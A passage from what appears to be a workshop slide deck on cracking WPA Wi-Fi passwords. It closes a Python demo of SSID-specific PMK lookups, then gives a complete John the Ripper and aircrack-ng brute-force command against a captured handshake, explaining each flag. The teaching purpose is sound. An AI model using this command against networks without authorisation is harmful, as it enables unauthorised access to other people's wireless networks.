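    print("acm_dictionary:", lookup(table, wpa_pmk("workshop", "acm_dictionary")))
    # Same passphrase, a different SSID: a different PMK, so no hit at all.
    print("linksys:       ", lookup(table, wpa_pmk("workshop", "linksys")))
```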

243

244 BRUTE FORCING A PASSWORD

245 Brute forcing a password This is the most time consuming method, although it is guaranteed to eventually find the password

246 Brute forcing a password As you already have the four-way handshake, we will be moving right into the cracking portion of this example

247 Type #john --stdout --incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap john –program we are using, short for John the Ripper --stdout –writes the generated candidates to standard output instead of cracking with them --incremental:all –will step through all possible passwords | aircrack-ng –second program we are running, with its input supplied by John the Ripper -b 00:1a:c4:51:3c:31 –tells aircrack-ng which access point to attack -w - –read the word list from standard input, i.e. the output of John the Ripper acm_dictionary-01.cap –the file containing the four-way handshake to be brute forced

248 #john --stdout --incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap

249

250 Brute forcing a password The previous slide shows John the Ripper and aircrack-ng being used together There are ways to cut down on the number of possible passwords, for example –if you know the password is 14 characters, you can have john skip passwords less than and greater than 14 characters. This is the longest way to crack a password but also a guaranteed way to do it

